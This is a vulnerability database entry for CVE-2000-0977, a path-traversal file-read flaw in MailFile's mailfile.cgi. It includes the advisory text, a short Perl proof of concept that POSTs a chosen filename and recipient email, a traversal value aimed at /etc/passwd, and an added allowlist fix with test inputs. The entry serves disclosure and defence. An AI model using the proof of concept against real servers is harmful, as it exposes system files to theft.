MailFile Vulnerability

Vulnerability ID: 1106040
Vulnerability type: Unknown
Published: 2000-10-11
Updated: 2005-10-12
CVE ID: CVE-2000-0977
CNNVD-ID: CNNVD-200012-188
Affected platform: CGI
CVSS score: 5.0
|Vulnerability source
https://www.exploit-db.com/exploits/20303
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200012-188
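|Vulnerability details
The mailfile.cgi CGI program in MailFile version 1.10 contains a vulnerability. A remote attacker can read arbitrary files by specifying the target file name in the "filename" parameter of a POST request; the file is then emailed to the address specified in the "email" parameter.
|Exploit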
source: http://www.securityfocus.com/bid/1807/info

OatMeal studios' Mail-File is a CGI application that allows for sending of certain files to user-specified email addresses via a web interface. A vulnerability exists in this script that can be used to send the contents of any readable user-specified file to an email address. When used normally, the web interface provides the user with the option to select files to send that have been pre-configured in the script. The values of the form variables associated with each "pre-configured file" are the actual filenames that are used when opening the files. As a result, the user can manipulate the filename value so that the script will, instead of opening one of the "normal" options, open whatever has been specified as the filename (e.g. "../../../../../../../../../etc/passwd"). The script also checks the value of the referrer when accepting submitted input from the form but fails to protect against this attack. If exploited, an attacker can read arbitrary files on the filesystem with the privileges of the webserver. This may lead to further compromise.

#!/usr/bin/perl

use HTTP::Request::Common;
use LWP::UserAgent;

$ua = LWP::UserAgent->new;
$res = $ua->request(POST 'http://domain/mailfile.cgi',
[real_name => 'value1',
email => 'value2',
filename => 'value3',
]);

--snip--

value3 = target filename
value2 = where to send the file to
value1 = username.. can be anything.
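
The flaw described above comes from using the submitted "filename" value directly as a path. The following is an added example of the corrected pattern, not code from MailFile or from the advisory: the form carries an opaque key and the server maps it to a file. The key names, file names and the resolve_selection helper are hypothetical, and the demo directory is constructed at run time.

```perl
#!/usr/bin/perl
# Added example (not MailFile's code): resolve the form's "filename" value
# through a server-side allowlist instead of opening it as a path.
use strict;
use warnings;
use Cwd qw(realpath);
use File::Temp qw(tempdir);
use File::Spec;

# Constructed demo tree standing in for the directory of mailable files.
my $BASE = realpath(tempdir(CLEANUP => 1));
my %ALLOWED = (brochure => 'brochure.txt', pricelist => 'pricelist.txt'); # hypothetical
for my $name (values %ALLOWED) {
    open my $fh, '>', File::Spec->catfile($BASE, $name) or die "setup: $!";
    print {$fh} "demo\n";
    close $fh;
}

# Returns the absolute path for a submitted key, or undef if it is rejected.
# A Referer check adds nothing here: that header is set by the client.
sub resolve_selection {
    my ($key) = @_;
    # The form value is an opaque key, never a path: no dots, slashes or NULs.
    return undef unless defined $key && $key =~ /\A[a-z0-9_]{1,32}\z/;
    # The server, not the client, decides which file a key refers to.
    my $name = $ALLOWED{$key} or return undef;
    my $real = realpath(File::Spec->catfile($BASE, $name)) or return undef;
    # Defence in depth: the canonical path must still sit under $BASE,
    # which catches a symlink planted inside the directory.
    return undef unless index($real, "$BASE/") == 0;
    return $real;
}

# Constructed inputs: one legitimate key, then values of the kind the
# advisory describes plus a few near misses.
for my $input ('brochure', '../../../../../../../../../etc/passwd',
               'brochure.txt', "pricelist\0", '') {
    my $path = resolve_selection($input);
    (my $shown = $input) =~ s/[^\x20-\x7e]/?/g;   # keep the output printable
    printf "%-45s => %s\n", "'$shown'", defined $path ? 'send' : 'reject';
}
```
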
|References

Source: BID
Name: 1807
Link: http://www.securityfocus.com/bid/1807
Source: BUGTRAQ
Name: 20001011MailFilePOSTVulnerability
Link: http://archives.neohapsis.com/archives/bugtraq/2000-10/0172.html
Source: XF
Name: mailfile-post-file-read
Link: http://xforce.iss.net/static/5358.php